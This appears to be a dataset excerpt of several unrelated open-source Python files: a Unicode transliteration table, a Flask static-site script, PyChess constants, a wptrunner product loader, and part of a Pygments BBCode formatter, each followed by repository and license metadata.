(0xA74F, u"oo"),
(0x223, u"ou"),
(0x1A4, u"P"),
(0x1D18, u"P"),
(0x1E54, u"P"),
(0x1E56, u"P"),
(0x24C5, u"P"),
(0x2C63, u"P"),
(0xA750, u"P"),
(0xA752, u"P"),
(0xA754, u"P"),
(0xFF30, u"P"),
(0x1A5, u"p"),
(0x1D71, u"p"),
(0x1D7D, u"p"),
(0x1D88, u"p"),
(0x1E55, u"p"),
(0x1E57, u"p"),
(0x24DF, u"p"),
(0xA751, u"p"),
(0xA753, u"p"),
(0xA755, u"p"),
(0xA7FC, u"p"),
(0xFF50, u"p"),
(0x24AB, u"(p)"),
(0x24A, u"Q"),
(0x24C6, u"Q"),
(0xA756, u"Q"),
(0xA758, u"Q"),
(0xFF31, u"Q"),
(0x138, u"q"),
(0x24B, u"q"),
(0x2A0, u"q"),
(0x24E0, u"q"),
(0xA757, u"q"),
(0xA759, u"q"),
(0xFF51, u"q"),
(0x24AC, u"(q)"),
(0x239, u"qp"),
(0x154, u"R"),
(0x156, u"R"),
(0x158, u"R"),
(0x210, u"R"),
(0x212, u"R"),
(0x24C, u"R"),
(0x280, u"R"),
(0x281, u"R"),
(0x1D19, u"R"),
(0x1D1A, u"R"),
(0x1E58, u"R"),
(0x1E5A, u"R"),
(0x1E5C, u"R"),
(0x1E5E, u"R"),
(0x24C7, u"R"),
(0x2C64, u"R"),
(0xA75A, u"R"),
(0xA782, u"R"),
(0xFF32, u"R"),
(0x155, u"r"),
(0x157, u"r"),
(0x159, u"r"),
(0x211, u"r"),
(0x213, u"r"),
(0x24D, u"r"),
(0x27C, u"r"),
(0x27D, u"r"),
(0x27E, u"r"),
(0x27F, u"r"),
(0x1D63, u"r"),
(0x1D72, u"r"),
(0x1D73, u"r"),
(0x1D89, u"r"),
(0x1E59, u"r"),
(0x1E5B, u"r"),
(0x1E5D, u"r"),
(0x1E5F, u"r"),
(0x24E1, u"r"),
(0xA75B, u"r"),
(0xA783, u"r"),
(0xFF52, u"r"),
(0x24AD, u"(r)"),
(0x15A, u"S"),
(0x15C, u"S"),
(0x15E, u"S"),
(0x160, u"S"),
(0x218, u"S"),
(0x1E60, u"S"),
(0x1E62, u"S"),
(0x1E64, u"S"),
(0x1E66, u"S"),
(0x1E68, u"S"),
(0x24C8, u"S"),
(0xA731, u"S"),
(0xA785, u"S"),
(0xFF33, u"S"),
(0x15B, u"s"),
(0x15D, u"s"),
(0x15F, u"s"),
(0x161, u"s"),
(0x17F, u"s"),
(0x219, u"s"),
(0x23F, u"s"),
(0x282, u"s"),
(0x1D74, u"s"),
(0x1D8A, u"s"),
(0x1E61, u"s"),
(0x1E63, u"s"),
(0x1E65, u"s"),
(0x1E67, u"s"),
(0x1E69, u"s"),
(0x1E9C, u"s"),
(0x1E9D, u"s"),
(0x24E2, u"s"),
(0xA784, u"s"),
(0xFF53, u"s"),
(0x1E9E, u"SS"),
(0x24AE, u"(s)"),
(0xDF, u"ss"),
(0xFB06, u"st"),
(0x162, u"T"),
(0x164, u"T"),
(0x166, u"T"),
(0x1AC, u"T"),
(0x1AE, u"T"),
(0x21A, u"T"),
(0x23E, u"T"),
(0x1D1B, u"T"),
(0x1E6A, u"T"),
(0x1E6C, u"T"),
(0x1E6E, u"T"),
(0x1E70, u"T"),
(0x24C9, u"T"),
(0xA786, u"T"),
(0xFF34, u"T"),
(0x163, u"t"),
(0x165, u"t"),
(0x167, u"t"),
(0x1AB, u"t"),
(0x1AD, u"t"),
(0x21B, u"t"),
(0x236, u"t"),
(0x287, u"t"),
(0x288, u"t"),
(0x1D75, u"t"),
(0x1E6B, u"t"),
(0x1E6D, u"t"),
(0x1E6F, u"t"),
(0x1E71, u"t"),
(0x1E97, u"t"),
(0x24E3, u"t"),
(0x2C66, u"t"),
(0xFF54, u"t"),
(0xDE, u"TH"),
(0xA766, u"TH"),
(0xA728, u"TZ"),
(0x24AF, u"(t)"),
(0x2A8, u"tc"),
(0xFE, u"th"),
(0x1D7A, u"th"),
(0xA767, u"th"),
(0x2A6, u"ts"),
(0xA729, u"tz"),
(0xD9, u"U"),
(0xDA, u"U"),
(0xDB, u"U"),
(0xDC, u"U"),
(0x168, u"U"),
(0x16A, u"U"),
(0x16C, u"U"),
(0x16E, u"U"),
(0x170, u"U"),
(0x172, u"U"),
(0x1AF, u"U"),
(0x1D3, u"U"),
(0x1D5, u"U"),
(0x1D7, u"U"),
(0x1D9, u"U"),
(0x1DB, u"U"),
(0x214, u"U"),
(0x216, u"U"),
(0x244, u"U"),
(0x1D1C, u"U"),
(0x1D7E, u"U"),
(0x1E72, u"U"),
(0x1E74, u"U"),
(0x1E76, u"U"),
(0x1E78, u"U"),
(0x1E7A, u"U"),
(0x1EE4, u"U"),
(0x1EE6, u"U"),
(0x1EE8, u"U"),
(0x1EEA, u"U"),
(0x1EEC, u"U"),
(0x1EEE, u"U"),
(0x1EF0, u"U"),
(0x24CA, u"U"),
(0xFF35, u"U"),
(0xF9, u"u"),
(0xFA, u"u"),
(0xFB, u"u"),
(0xFC, u"u"),
(0x169, u"u"),
(0x16B, u"u"),
(0x16D, u"u"),
(0x16F, u"u"),
(0x171, u"u"),
(0x173, u"u"),
(0x1B0, u"u"),
(0x1D4, u"u"),
(0x1D6, u"u"),
(0x1D8, u"u"),
(0x1DA, u"u"),
(0x1DC, u"u"),
(0x215, u"u"),
(0x217, u"u"),
(0x289, u"u"),
(0x1D64, u"u"),
(0x1D99, u"u"),
(0x1E73, u"u"),
(0x1E75, u"u"),
(0x1E77, u"u"),
(0x1E79, u"u"),
(0x1E7B, u"u"),
(0x1EE5, u"u"),
(0x1EE7, u"u"),
(0x1EE9, u"u"),
(0x1EEB, u"u"),
(0x1EED, u"u"),
(0x1EEF, u"u"),
(0x1EF1, u"u"),
(0x24E4, u"u"),
(0xFF55, u"u"),
(0x24B0, u"(u)"),
(0x1D6B, u"ue"),
(0x1B2, u"V"),
(0x245, u"V"),
(0x1D20, u"V"),
(0x1E7C, u"V"),
(0x1E7E, u"V"),
(0x1EFC, u"V"),
(0x24CB, u"V"),
(0xA75E, u"V"),
(0xA768, u"V"),
(0xFF36, u"V"),
(0x28B, u"v"),
(0x28C, u"v"),
(0x1D65, u"v"),
(0x1D8C, u"v"),
(0x1E7D, u"v"),
(0x1E7F, u"v"),
(0x24E5, u"v"),
(0x2C71, u"v"),
(0x2C74, u"v"),
(0xA75F, u"v"),
(0xFF56, u"v"),
(0xA760, u"VY"),
(0x24B1, u"(v)"),
(0xA761, u"vy"),
(0x174, u"W"),
(0x1F7, u"W"),
(0x1D21, u"W"),
(0x1E80, u"W"),
(0x1E82, u"W"),
(0x1E84, u"W"),
(0x1E86, u"W"),
(0x1E88, u"W"),
(0x24CC, u"W"),
(0x2C72, u"W"),
(0xFF37, u"W"),
(0x175, u"w"),
(0x1BF, u"w"),
(0x28D, u"w"),
(0x1E81, u"w"),
(0x1E83, u"w"),
(0x1E85, u"w"),
(0x1E87, u"w"),
(0x1E89, u"w"),
(0x1E98, u"w"),
(0x24E6, u"w"),
(0x2C73, u"w"),
(0xFF57, u"w"),
(0x24B2, u"(w)"),
(0x1E8A, u"X"),
(0x1E8C, u"X"),
(0x24CD, u"X"),
(0xFF38, u"X"),
(0x1D8D, u"x"),
(0x1E8B, u"x"),
(0x1E8D, u"x"),
(0x2093, u"x"),
(0x24E7, u"x"),
(0xFF58, u"x"),
(0x24B3, u"(x)"),
(0xDD, u"Y"),
(0x176, u"Y"),
(0x178, u"Y"),
(0x1B3, u"Y"),
(0x232, u"Y"),
(0x24E, u"Y"),
(0x28F, u"Y"),
(0x1E8E, u"Y"),
(0x1EF2, u"Y"),
(0x1EF4, u"Y"),
(0x1EF6, u"Y"),
(0x1EF8, u"Y"),
(0x1EFE, u"Y"),
(0x24CE, u"Y"),
(0xFF39, u"Y"),
(0xFD, u"y"),
(0xFF, u"y"),
(0x177, u"y"),
(0x1B4, u"y"),
(0x233, u"y"),
(0x24F, u"y"),
(0x28E, u"y"),
(0x1E8F, u"y"),
(0x1E99, u"y"),
(0x1EF3, u"y"),
(0x1EF5, u"y"),
(0x1EF7, u"y"),
(0x1EF9, u"y"),
(0x1EFF, u"y"),
(0x24E8, u"y"),
(0xFF59, u"y"),
(0x24B4, u"(y)"),
(0x179, u"Z"),
(0x17B, u"Z"),
(0x17D, u"Z"),
(0x1B5, u"Z"),
(0x21C, u"Z"),
(0x224, u"Z"),
(0x1D22, u"Z"),
(0x1E90, u"Z"),
(0x1E92, u"Z"),
(0x1E94, u"Z"),
(0x24CF, u"Z"),
(0x2C6B, u"Z"),
(0xA762, u"Z"),
(0xFF3A, u"Z"),
(0x17A, u"z"),
(0x17C, u"z"),
(0x17E, u"z"),
(0x1B6, u"z"),
(0x21D, u"z"),
(0x225, u"z"),
(0x240, u"z"),
(0x290, u"z"),
(0x291, u"z"),
(0x1D76, u"z"),
(0x1D8E, u"z"),
(0x1E91, u"z"),
(0x1E93, u"z"),
(0x1E95, u"z"),
(0x24E9, u"z"),
(0x2C6C, u"z"),
(0xA763, u"z"),
(0xFF5A, u"z"),
(0x24B5, u"(z)"),
(0x2070, u"0"),
(0x2080, u"0"),
(0x24EA, u"0"),
(0x24FF, u"0"),
(0xFF10, u"0"),
(0xB9, u"1"),
(0x2081, u"1"),
(0x2460, u"1"),
(0x24F5, u"1"),
(0x2776, u"1"),
(0x2780, u"1"),
(0x278A, u"1"),
(0xFF11, u"1"),
(0x2488, u"1."),
(0x2474, u"(1)"),
(0xB2, u"2"),
(0x2082, u"2"),
(0x2461, u"2"),
(0x24F6, u"2"),
(0x2777, u"2"),
(0x2781, u"2"),
(0x278B, u"2"),
(0xFF12, u"2"),
(0x2489, u"2."),
(0x2475, u"(2)"),
(0xB3, u"3"),
(0x2083, u"3"),
(0x2462, u"3"),
(0x24F7, u"3"),
(0x2778, u"3"),
(0x2782, u"3"),
(0x278C, u"3"),
(0xFF13, u"3"),
(0x248A, u"3."),
(0x2476, u"(3)"),
(0x2074, u"4"),
(0x2084, u"4"),
(0x2463, u"4"),
(0x24F8, u"4"),
(0x2779, u"4"),
(0x2783, u"4"),
(0x278D, u"4"),
(0xFF14, u"4"),
(0x248B, u"4."),
(0x2477, u"(4)"),
(0x2075, u"5"),
(0x2085, u"5"),
(0x2464, u"5"),
(0x24F9, u"5"),
(0x277A, u"5"),
(0x2784, u"5"),
(0x278E, u"5"),
(0xFF15, u"5"),
(0x248C, u"5."),
(0x2478, u"(5)"),
(0x2076, u"6"),
(0x2086, u"6"),
(0x2465, u"6"),
(0x24FA, u"6"),
(0x277B, u"6"),
(0x2785, u"6"),
(0x278F, u"6"),
(0xFF16, u"6"),
(0x248D, u"6."),
(0x2479, u"(6)"),
(0x2077, u"7"),
(0x2087, u"7"),
(0x2466, u"7"),
(0x24FB, u"7"),
(0x277C, u"7"),
(0x2786, u"7"),
(0x2790, u"7"),
(0xFF17, u"7"),
(0x248E, u"7."),
(0x247A, u"(7)"),
(0x2078, u"8"),
(0x2088, u"8"),
(0x2467, u"8"),
(0x24FC, u"8"),
(0x277D, u"8"),
(0x2787, u"8"),
(0x2791, u"8"),
(0xFF18, u"8"),
(0x248F, u"8."),
(0x247B, u"(8)"),
(0x2079, u"9"),
(0x2089, u"9"),
(0x2468, u"9"),
(0x24FD, u"9"),
(0x277E, u"9"),
(0x2788, u"9"),
(0x2792, u"9"),
(0xFF19, u"9"),
(0x2490, u"9."),
(0x247C, u"(9)"),
(0x2469, u"10"),
(0x24FE, u"10"),
(0x277F, u"10"),
(0x2789, u"10"),
(0x2793, u"10"),
(0x2491, u"10."),
(0x247D, u"(10)"),
(0x246A, u"11"),
(0x24EB, u"11"),
(0x2492, u"11."),
(0x247E, u"(11)"),
(0x246B, u"12"),
(0x24EC, u"12"),
(0x2493, u"12."),
(0x247F, u"(12)"),
(0x246C, u"13"),
(0x24ED, u"13"),
(0x2494, u"13."),
(0x2480, u"(13)"),
(0x246D, u"14"),
(0x24EE, u"14"),
(0x2495, u"14."),
(0x2481, u"(14)"),
(0x246E, u"15"),
(0x24EF, u"15"),
(0x2496, u"15."),
(0x2482, u"(15)"),
(0x246F, u"16"),
(0x24F0, u"16"),
(0x2497, u"16."),
(0x2483, u"(16)"),
(0x2470, u"17"),
(0x24F1, u"17"),
(0x2498, u"17."),
(0x2484, u"(17)"),
(0x2471, u"18"),
(0x24F2, u"18"),
(0x2499, u"18."),
(0x2485, u"(18)"),
(0x2472, u"19"),
(0x24F3, u"19"),
(0x249A, u"19."),
(0x2486, u"(19)"),
(0x2473, u"20"),
(0x24F4, u"20"),
(0x249B, u"20."),
(0x2487, u"(20)"),
(0xAB, u'"'),
(0xBB, u'"'),
(0x201C, u'"'),
(0x201D, u'"'),
(0x201E, u'"'),
(0x2033, u'"'),
(0x2036, u'"'),
(0x275D, u'"'),
(0x275E, u'"'),
(0x276E, u'"'),
(0x276F, u'"'),
(0xFF02, u'"'),
(0x2018, u"'"),
(0x2019, u"'"),
(0x201A, u"'"),
(0x201B, u"'"),
(0x2032, u"'"),
(0x2035, u"'"),
(0x2039, u"'"),
(0x203A, u"'"),
(0x275B, u"'"),
(0x275C, u"'"),
(0xFF07, u"'"),
(0x2010, u"-"),
(0x2011, u"-"),
(0x2012, u"-"),
(0x2013, u"-"),
(0x2014, u"-"),
(0x207B, u"-"),
(0x208B, u"-"),
(0xFF0D, u"-"),
(0x2045, u"["),
(0x2772, u"["),
(0xFF3B, u"["),
(0x2046, u"]"),
(0x2773, u"]"),
(0xFF3D, u"]"),
(0x207D, u"("),
(0x208D, u"("),
(0x2768, u"("),
(0x276A, u"("),
(0xFF08, u"("),
(0x2E28, u"(("),
(0x207E, u")"),
(0x208E, u")"),
(0x2769, u")"),
(0x276B, u")"),
(0xFF09, u")"),
(0x2E29, u"))"),
(0x276C, u"<"),
(0x2770, u"<"),
(0xFF1C, u"<"),
(0x276D, u">"),
(0x2771, u">"),
(0xFF1E, u">"),
(0x2774, u"{"),
(0xFF5B, u"{"),
(0x2775, u"}"),
(0xFF5D, u"}"),
(0x207A, u"+"),
(0x208A, u"+"),
(0xFF0B, u"+"),
(0x207C, u"="),
(0x208C, u"="),
(0xFF1D, u"="),
(0xFF01, u"!"),
(0x203C, u"!!"),
(0x2049, u"!?"),
(0xFF03, u"#"),
(0xFF04, u"$"),
(0x2052, u"%"),
(0xFF05, u"%"),
(0xFF06, u"&"),
(0x204E, u"*"),
(0xFF0A, u"*"),
(0xFF0C, u","),
(0xFF0E, u"."),
(0x2044, u"/"),
(0xFF0F, u"/"),
(0xFF1A, u":"),
(0x204F, u";"),
(0xFF1B, u";"),
(0xFF1F, u"?"),
(0x2047, u"??"),
(0x2048, u"?!"),
(0xFF20, u"@"),
(0xFF3C, u"\\"),
(0x2038, u"^"),
(0xFF3E, u"^"),
(0xFF3F, u"_"),
(0x2053, u"~"),
(0xFF5E, u"~"),
]
translate_table = codepoint_to_self + codepoint_to_replacement
| gpl-3.0 |
lem-usp/Bio507 | site.py | 1 | 3672 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals # unicode by default
import sys
import datetime
from collections import OrderedDict
import pandoc
#import bib
from flask import Flask
from flask import render_template, redirect, url_for
from flaskext.babel import Babel
from flask_flatpages import FlatPages
from flask_frozen import Freezer
# TODO:
# * Get babel locale from request path
# Create the Flask app
app = Flask(__name__)
# Load settings
app.config.from_pyfile('settings/common.py')
app.config.from_pyfile('settings/local_settings.py', silent=True)
if len(sys.argv) > 2:
extra_conf = sys.argv[2]
app.config.from_pyfile('settings/{}_settings.py'.format(extra_conf), silent=True)
# Add the babel extension
babel = Babel(app)
# Add the FlatPages extension
pages = FlatPages(app)
# Add the Frozen extension
freezer = Freezer(app)
#
# Utils
#
# Frozen url generators
@freezer.register_generator
def default_locale_urls():
''' Genarates the urls for default locale without prefix. '''
for page in pages:
yield '/{}/'.format(remove_l10n_prefix(page.path))
@freezer.register_generator
def page_urls():
''' Genarates the urls with locale prefix. '''
for page in pages:
yield '/{}/'.format(page.path)
# l10n helpers
def has_l10n_prefix(path):
''' Verifies if the path have a localization prefix. '''
return reduce(lambda x, y: x or y, [path.startswith(l)
for l in app.config.get('AVAILABLE_LOCALES', [])])
def add_l10n_prefix(path, locale=app.config.get('DEFAULT_LOCALE')):
'''' Add localization prefix if necessary. '''
return path if has_l10n_prefix(path) else '{}/{}'.format(locale, path)
def remove_l10n_prefix(path, locale=app.config.get('DEFAULT_LOCALE')):
''' Remove specific localization prefix. '''
return path if not path.startswith(locale) else path[(len(locale) + 1):]
# Make remove_l10n_prefix accessible to Jinja
app.jinja_env.globals.update(remove_l10n_prefix=remove_l10n_prefix)
# Structure helpers
def render_markdown(text):
''' Render Markdown text to HTML. '''
doc = pandoc.Document()
# doc.bib(app.config.get('BIB_FILE', 'static/papers.bib'))
doc.markdown = text.encode('utf8')
return unicode(doc.html, 'utf8')
app.config['FLATPAGES_HTML_RENDERER'] = render_markdown
#
# Routes
#
@app.route('/')
def root():
''' Main page '''
# Get the page
path = 'Main'
page = pages.get_or_404(add_l10n_prefix(path))
today = datetime.datetime.now().strftime("%B %dth %Y")
return render_template('root.html', today=today, page=page, pages=pages)
#def get_papers():
# bib_file = open(app.config.get('BIB_FILE', 'static/papers.bib'))
# b = bib.Bibparser(bib_file.read())
# b.parse()
# return b
@app.route('/<path:path>/')
def page(path):
''' All pages from markdown files '''
# Get the page
page = pages.get_or_404(add_l10n_prefix(path))
# Get custom template
template = page.meta.get('template', 'page.html')
# Verify if need redirect
redirect_ = page.meta.get('redirect', None)
if redirect_:
return redirect(url_for('page', path=redirect_))
# if path == 'Papers' or path == add_l10n_prefix('Papers'):
# b = get_papers()
# return render_template(template, page=page, pages=pages, bib=b)
today = datetime.datetime.now().strftime("%B %dth %Y")
# Render the page
return render_template(template, page=page, today=today, pages=pages)
#
# Main
#
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == 'build':
freezer.freeze()
else:
app.run(port=8000)
| mit |
importsfromgooglecode/pychess | lib/pychess/Utils/const.py | 20 | 9143 | # -*- coding: UTF-8 -*-
################################################################################
# PyChess information #
################################################################################
NAME = "PyChess"
ENGINES_XML_API_VERSION = "0.12"
################################################################################
# Player info #
################################################################################
# Player types
LOCAL, ARTIFICIAL, REMOTE = range(3)
# Engine strengths
EASY, INTERMEDIATE, EXPERT = range(3)
# Player colors
WHITE, BLACK = range(2)
################################################################################
# Game values #
################################################################################
# Game states
WAITING_TO_START, PAUSED, RUNNING, DRAW, WHITEWON, BLACKWON, KILLED, \
ADJOURNED, ABORTED, UNKNOWN_STATE = range(10)
reprResult = ["*", "*", "*", "1/2-1/2", "1-0", "0-1", "?", "*", "?", "?"]
UNDOABLE_STATES = (DRAW, WHITEWON, BLACKWON)
UNFINISHED_STATES = (WAITING_TO_START, PAUSED, RUNNING, UNKNOWN_STATE)
# Chess variants
NORMALCHESS, CORNERCHESS, SHUFFLECHESS, FISCHERRANDOMCHESS, RANDOMCHESS, \
ASYMMETRICRANDOMCHESS, UPSIDEDOWNCHESS, PAWNSPUSHEDCHESS, PAWNSPASSEDCHESS, \
THEBANCHESS, PAWNODDSCHESS, KNIGHTODDSCHESS, ROOKODDSCHESS, QUEENODDSCHESS, \
BLINDFOLDCHESS, HIDDENPAWNSCHESS, HIDDENPIECESCHESS, ALLWHITECHESS, \
ATOMICCHESS, BUGHOUSECHESS, CRAZYHOUSECHESS, LOSERSCHESS, SUICIDECHESS, \
WILDCASTLECHESS, WILDCASTLESHUFFLECHESS, KINGOFTHEHILLCHESS = range(26)
UNSUPPORTED = (BUGHOUSECHESS,)
# Chess variant groups
VARIANTS_BLINDFOLD, VARIANTS_ODDS, VARIANTS_SHUFFLE, VARIANTS_OTHER, VARIANTS_OTHER_NONSTANDARD = range(5)
# Action errors
ACTION_ERROR_NOT_OUT_OF_TIME, \
ACTION_ERROR_CLOCK_NOT_STARTED, ACTION_ERROR_SWITCH_UNDERWAY, \
ACTION_ERROR_CLOCK_NOT_PAUSED, ACTION_ERROR_TOO_LARGE_UNDO, \
ACTION_ERROR_NONE_TO_ACCEPT, ACTION_ERROR_NONE_TO_WITHDRAW, \
ACTION_ERROR_NONE_TO_DECLINE, = range(8)
# Game state reasons
ABORTED_ADJUDICATION, ABORTED_AGREEMENT, ABORTED_COURTESY, ABORTED_EARLY, \
ABORTED_SERVER_SHUTDOWN, ADJOURNED_COURTESY, ABORTED_DISCONNECTION, \
ADJOURNED_AGREEMENT, ADJOURNED_LOST_CONNECTION, ADJOURNED_SERVER_SHUTDOWN, \
ADJOURNED_COURTESY_WHITE, ADJOURNED_COURTESY_BLACK, \
ADJOURNED_LOST_CONNECTION_WHITE, ADJOURNED_LOST_CONNECTION_BLACK, \
DRAW_50MOVES, DRAW_ADJUDICATION, DRAW_AGREE, DRAW_CALLFLAG, DRAW_INSUFFICIENT, \
DRAW_EQUALMATERIAL, DRAW_LENGTH, DRAW_REPITITION, DRAW_STALEMATE, \
DRAW_BLACKINSUFFICIENTANDWHITETIME, DRAW_WHITEINSUFFICIENTANDBLACKTIME, \
WON_ADJUDICATION, WON_CALLFLAG, WON_DISCONNECTION, WON_MATE, WON_RESIGN, \
WON_LESSMATERIAL, WON_NOMATERIAL, WON_KINGEXPLODE, WON_KINGINCENTER, \
WHITE_ENGINE_DIED, BLACK_ENGINE_DIED, DISCONNECTED, UNKNOWN_REASON = range(38)
UNDOABLE_REASONS = (DRAW_50MOVES, DRAW_INSUFFICIENT, DRAW_LENGTH,
DRAW_REPITITION, DRAW_STALEMATE, DRAW_AGREE, DRAW_CALLFLAG, \
DRAW_BLACKINSUFFICIENTANDWHITETIME, \
DRAW_WHITEINSUFFICIENTANDBLACKTIME, \
WON_MATE, WON_NOMATERIAL, WON_CALLFLAG, WON_RESIGN)
UNRESUMEABLE_REASONS = (DRAW_50MOVES, DRAW_INSUFFICIENT, DRAW_LENGTH, \
DRAW_REPITITION, DRAW_STALEMATE, WON_MATE, WON_NOMATERIAL)
# Player actions
RESIGNATION = "resignation"
FLAG_CALL = "flag call"
DRAW_OFFER = "draw offer"
ABORT_OFFER = "abort offer"
ADJOURN_OFFER = "adjourn offer"
PAUSE_OFFER = "pause offer"
RESUME_OFFER = "resume offer"
SWITCH_OFFER = "switch offer"
TAKEBACK_OFFER = "takeback offer"
MATCH_OFFER = "match offer"
HURRY_ACTION = "hurry action"
CHAT_ACTION = "chat action"
ACTIONS = (RESIGNATION, FLAG_CALL, DRAW_OFFER, ABORT_OFFER, ADJOURN_OFFER, \
PAUSE_OFFER, RESUME_OFFER, SWITCH_OFFER, TAKEBACK_OFFER, \
MATCH_OFFER, HURRY_ACTION, CHAT_ACTION)
OFFERS = (DRAW_OFFER, ABORT_OFFER, ADJOURN_OFFER, PAUSE_OFFER, \
RESUME_OFFER, SWITCH_OFFER, TAKEBACK_OFFER, MATCH_OFFER)
INGAME_ACTIONS = (RESIGNATION, FLAG_CALL, DRAW_OFFER, ABORT_OFFER, \
ADJOURN_OFFER, PAUSE_OFFER, SWITCH_OFFER, HURRY_ACTION)
# A few nice to have boards
FEN_EMPTY = "4k3/8/8/8/8/8/8/4K3 w - - 0 1"
FEN_START = "rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq - 0 1"
################################################################################
# Search values #
################################################################################
hashfALPHA, hashfBETA, hashfEXACT, hashfBAD = range(4)
# Engine modes
NORMAL, ANALYZING, INVERSE_ANALYZING = range(3)
################################################################################
# Piece types #
################################################################################
# BPAWN is a pawn that moves in the opposite direction
EMPTY, PAWN, KNIGHT, BISHOP, ROOK, QUEEN, KING, BPAWN = range(8)
# Is sliding piece
sliders = [ False, False, False, True, True, True, False, False ]
# Piece signs
reprSign = ["", "P", "N", "B", "R", "Q", "K"]
chr2Sign = {"k":KING, "q": QUEEN, "r": ROOK, "b": BISHOP, "n": KNIGHT, "p":PAWN}
chrU2Sign = {"K":KING, "Q": QUEEN, "R": ROOK, "B": BISHOP, "N": KNIGHT, "P":PAWN}
################################################################################
# Move values #
################################################################################
NORMAL_MOVE, QUEEN_CASTLE, KING_CASTLE, ENPASSANT, \
KNIGHT_PROMOTION, BISHOP_PROMOTION, ROOK_PROMOTION, QUEEN_PROMOTION, KING_PROMOTION, NULL_MOVE, DROP = range(11)
PROMOTIONS = (KING_PROMOTION, QUEEN_PROMOTION, ROOK_PROMOTION, BISHOP_PROMOTION, KNIGHT_PROMOTION)
# Algebraic notation types: Short, Long, Figure and Simpe
SAN, LAN, FAN, AN = range(4)
# Castling notation types: e.g., O-O, e1g1, e1h1
CASTLE_SAN, CASTLE_KK, CASTLE_KR = range(3)
FAN_PIECES = [
["", u"♙", u"♘", u"♗", u"♖", u"♕", u"♔", ""],
["", u"♟", u"♞", u"♝", u"♜", u"♛", u"♚", ""]
]
################################################################################
# Castling values #
################################################################################
W_OO, W_OOO, B_OO, B_OOO = [2**i for i in range(4)]
CAS_FLAGS = ((W_OOO,W_OO),(B_OOO,B_OO))
W_CASTLED, B_CASTLED = [2**i for i in range(2)]
################################################################################
# Cords types #
################################################################################
A1, B1, C1, D1, E1, F1, G1, H1, \
A2, B2, C2, D2, E2, F2, G2, H2, \
A3, B3, C3, D3, E3, F3, G3, H3, \
A4, B4, C4, D4, E4, F4, G4, H4, \
A5, B5, C5, D5, E5, F5, G5, H5, \
A6, B6, C6, D6, E6, F6, G6, H6, \
A7, B7, C7, D7, E7, F7, G7, H7, \
A8, B8, C8, D8, E8, F8, G8, H8 = range (64)
reprCord = [
"a1", "b1", "c1", "d1", "e1", "f1", "g1", "h1",
"a2", "b2", "c2", "d2", "e2", "f2", "g2", "h2",
"a3", "b3", "c3", "d3", "e3", "f3", "g3", "h3",
"a4", "b4", "c4", "d4", "e4", "f4", "g4", "h4",
"a5", "b5", "c5", "d5", "e5", "f5", "g5", "h5",
"a6", "b6", "c6", "d6", "e6", "f6", "g6", "h6",
"a7", "b7", "c7", "d7", "e7", "f7", "g7", "h7",
"a8", "b8", "c8", "d8", "e8", "f8", "g8", "h8"
]
reprFile = ["a", "b", "c", "d", "e", "f", "g", "h"]
reprRank = ["1", "2", "3", "4", "5", "6", "7", "8"]
cordDic = {}
for cord, name in enumerate(reprCord):
cordDic[name] = cord
################################################################################
# User interface #
################################################################################
# Hint modes
OPENING, ENDGAME, HINT, SPY = ["opening", "endgame", "hint", "spy"]
# Sound settings
SOUND_MUTE, SOUND_BEEP, SOUND_SELECT, SOUND_URI = range(4)
# Brush types. Send piece object for Piece brush
CLEAR, ENPAS = range(2)
# Main menu items
GAME_MENU_ITEMS = ("save_game1", "save_game_as1", "export_position1", "analyze_game1",
"properties1", "close1")
ACTION_MENU_ITEMS = ("abort", "adjourn", "draw", "pause1", "resume1", "undo1",
"call_flag", "resign", "ask_to_move")
VIEW_MENU_ITEMS = ("rotate_board1", "show_sidepanels", "hint_mode", "spy_mode")
MENU_ITEMS = GAME_MENU_ITEMS + ACTION_MENU_ITEMS + VIEW_MENU_ITEMS
################################################################################
# Subprocess #
################################################################################
SUBPROCESS_PTY, SUBPROCESS_SUBPROCESS, SUBPROCESS_FORK = range(3)
| gpl-3.0 |
sliz1/servo | tests/wpt/harness/wptrunner/products.py | 118 | 2500 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import os
import importlib
import imp
from .browsers import product_list
def products_enabled(config):
names = config.get("products", {}).keys()
if not names:
return product_list
else:
return names
def product_module(config, product):
here = os.path.join(os.path.split(__file__)[0])
product_dir = os.path.join(here, "browsers")
if product not in products_enabled(config):
raise ValueError("Unknown product %s" % product)
path = config.get("products", {}).get(product, None)
if path:
module = imp.load_source('wptrunner.browsers.' + product, path)
else:
module = importlib.import_module("wptrunner.browsers." + product)
if not hasattr(module, "__wptrunner__"):
raise ValueError("Product module does not define __wptrunner__ variable")
return module
def load_product(config, product):
module = product_module(config, product)
data = module.__wptrunner__
check_args = getattr(module, data["check_args"])
browser_cls = getattr(module, data["browser"])
browser_kwargs = getattr(module, data["browser_kwargs"])
executor_kwargs = getattr(module, data["executor_kwargs"])
env_options = getattr(module, data["env_options"])()
run_info_extras = (getattr(module, data["run_info_extras"])
if "run_info_extras" in data else lambda **kwargs:{})
executor_classes = {}
for test_type, cls_name in data["executor"].iteritems():
cls = getattr(module, cls_name)
executor_classes[test_type] = cls
return (check_args,
browser_cls, browser_kwargs,
executor_classes, executor_kwargs,
env_options, run_info_extras)
def load_product_update(config, product):
"""Return tuple of (property_order, boolean_properties) indicating the
run_info properties to use when constructing the expectation data for
this product. None for either key indicates that the default keys
appropriate for distinguishing based on platform will be used."""
module = product_module(config, product)
data = module.__wptrunner__
update_properties = (getattr(module, data["update_properties"])()
if "update_properties" in data else (None, None))
return update_properties
| mpl-2.0 |
vicky2135/lucious | oscar/lib/python2.7/site-packages/pygments/formatters/bbcode.py | 31 | 3314 | # -*- coding: utf-8 -*-
"""
pygments.formatters.bbcode
~~~~~~~~~~~~~~~~~~~~~~~~~~
BBcode formatter.
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.formatter import Formatter
from pygments.util import get_bool_opt
__all__ = ['BBCodeFormatter']
class BBCodeFormatter(Formatter):
"""
Format tokens with BBcodes. These formatting codes are used by many
bulletin boards, so you can highlight your sourcecode with pygments before
posting it there.
This formatter has no support for background colors and borders, as there
are no common BBcode tags for that.
Some board systems (e.g. phpBB) don't support colors in their [code] tag,
so you can't use the highlighting together with that tag.
Text in a [code] tag usually is shown with a monospace font (which this
formatter can do with the ``monofont`` option) and no spaces (which you
need for indentation) are removed.
